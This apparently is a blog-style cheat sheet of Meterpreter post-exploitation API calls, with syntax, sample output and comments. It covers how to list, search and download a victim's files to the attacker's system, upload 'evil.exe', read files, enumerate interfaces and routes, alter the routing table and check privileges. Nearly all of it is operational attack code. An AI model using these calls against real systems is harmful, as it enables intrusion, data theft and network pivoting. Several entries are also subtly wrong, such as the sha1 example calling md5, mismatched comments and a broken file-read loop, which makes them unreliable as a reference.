Meterpreter API cheat sheet

This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer.

Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be like a one stop shop.

Hope this will help newbies and enthusiast like me who want to start writing their own meterpreter scripts.

P.S : Not all the methods are covered as this is all i can do in 3 hours. More to update soon :)

Get all the files/folders in a directory

Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of c drive.

Get all the files/folders in a directory along with extra information

Syntax: client.fs.dir.entries_with_info
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of c drive.

Change the directory

Syntax: client.fs.dir.chdir("c:\\")
Output: 0
Comment: This will change the present working directory to c drive.

Make directory

Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" in c drive.

Get current working directory

Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name


Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name

Delete a directory

Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.

Download contents of a target directory

Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the file inside oldman directory of victim and will save inside the oldmanlab directory of an attacker system.

Upload contents of a local directory to victim system

Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside oldmanlab directory of an attacker to the oldman directory of victim system.

Get the file separator

Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for windows, \ for unix.

Search for the specified file

Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories

Get the basename for the specified file

Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.

Expand path of the directory

Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will give the absolute path of the shortcut specified

Get the md5 of file

Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file

Get the sha1 of file

Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file

Check if specified file exists

Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false

Delete specified file

Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false

Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false

Upload file to victims system

Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from attackers system to victims oldman directory

Download file from victims system

Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from victims system and will save it to attackers root directory

Open a file in read mode and copy the content to some variable

Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
              temp = ""
              until file1.eof?
              temp << file_object.read
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in temp variable

List all the available interface from victims system

Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc

Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc

Get the IP address of specified interface

Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.

List all the routes available in victims system

Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available in the victims system along with the details like subnet, netmask, gateway

Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return an array of the first route available in the victims system along with the details like subnet, netmask, gateway

Add a route in victims system

Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add route in the victims system. The first parameter is subnet, second is netmask and third is gateway.

Remove specified route from victims system

Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove route from the victims system. The first parameter is subnet, second is netmask and third is gateway.

Get the user id

Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.

Get the victims computer name

Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.

Get the victims operating system name and version

Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the operating system name running on the compromised system.

Get the victims operating system architecture

Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86,64-bit)of the operating system running on compromised system.

Get the victims operating system language

Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give operating system language of the compromised system.

Revert to previous user privileges

Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: Let say if we had change privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM" then revert to self will again change our privileges to "NT AUTHORITY\\oldmanlab"